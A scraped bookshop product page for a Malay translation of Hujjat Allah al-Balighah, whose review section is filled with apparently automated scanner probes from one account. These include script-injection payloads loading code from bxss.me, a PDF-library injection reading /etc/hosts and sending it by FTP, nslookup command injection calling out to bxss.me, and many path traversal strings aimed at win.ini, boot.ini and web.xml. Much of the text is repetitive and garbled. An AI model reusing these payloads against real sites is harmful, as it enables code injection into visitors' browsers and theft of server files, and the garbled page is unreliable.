You currently have
in your basket.

Hujjat Allāh Al-Bālighah: Terjemahan dan Anotasi (Juzuk I)

Zainuddin Hj. Idris & Nik Hassan Nik Abdullah
Availability: In stock
$28.00

ISBN 978-967-022-503-6

Page : 881

Year : 2015

 

Sinopsis

Buku ini merupakan terjemahan daripada kitab Hujjatullah al-Balighah karya Al-Imam Al-Syeikh Ahmad Qutubuddin Syah dan Waliyullah Abdul Rahim Al- Dihlawi. Kitab ini mengandungi dua bahagian. Bahagian pertama mengandungi tujuh perbahasan mengenai kaedah-kaedah umum  yang terdiri daripada segala maslahat dari setiap sudut. Kebanyakan maslahat ini didapati diakui dalam kalangan semua millah yang ada semasa zaman Rasulullah SAW dan tidak terdapat perselisihan dalam kalangan mereka pada perkara itu dan mereka yang hadir tidak perlu bertanya mengenai perkara itu. Bahagian kedua kitab ini pula menerangkan berkenaan rahsia hadith-hadith Rasulullah SAW secara terperinci seperti bab-bab iman, ilmu, kesucian, solat, zakat, puasa, haji dan ihsan. Kemudian, turut dihuraikan dengan terperinci berkenaan bab-bab muamalat, pentadbiran keluarga, politik kenegaraan, adab mencari kehidupan dan juga plbagai bab lain yang merangkumi segala aspek kehidupan.

ISBN 978-967-022-503-6

Page : 881

Year : 2015

 

Sinopsis

Buku ini merupakan terjemahan daripada kitab Hujjatullah al-Balighah karya Al-Imam Al-Syeikh Ahmad Qutubuddin Syah dan Waliyullah Abdul Rahim Al- Dihlawi. Kitab ini mengandungi dua bahagian. Bahagian pertama mengandungi tujuh perbahasan mengenai kaedah-kaedah umum  yang terdiri daripada segala maslahat dari setiap sudut. Kebanyakan maslahat ini didapati diakui dalam kalangan semua millah yang ada semasa zaman Rasulullah SAW dan tidak terdapat perselisihan dalam kalangan mereka pada perkara itu dan mereka yang hadir tidak perlu bertanya mengenai perkara itu. Bahagian kedua kitab ini pula menerangkan berkenaan rahsia hadith-hadith Rasulullah SAW secara terperinci seperti bab-bab iman, ilmu, kesucian, solat, zakat, puasa, haji dan ihsan. Kemudian, turut dihuraikan dengan terperinci berkenaan bab-bab muamalat, pentadbiran keluarga, politik kenegaraan, adab mencari kehidupan dan juga plbagai bab lain yang merangkumi segala aspek kehidupan.

Write your own review
  • Only registered users can write reviews
  • Bad
  • Excellent
Existing reviews
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-15979&h=18-37311-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-15980&h=18-37311-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-15980,18,37311,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-15981&h=18-37311-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-15982&h=18-37311-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-15982,18,37311,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-15983&h=18-37311-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-15984&h=18-37311-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-15984,18,37311,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-15993.18.37311.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-15994.18.37311.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15994.18.37311.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-15995.18.37311.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-15996.18.37311.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15996.18.37311.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-15997.18.37311.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-15998.18.37311.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15998.18.37311.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-15999.18.37311.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-16000.18.37311.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16000.18.37311.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-16001.18.37311.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-16002.18.37311.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16002.18.37311.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-16003.18.37311.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-16004.18.37311.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16004.18.37311.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\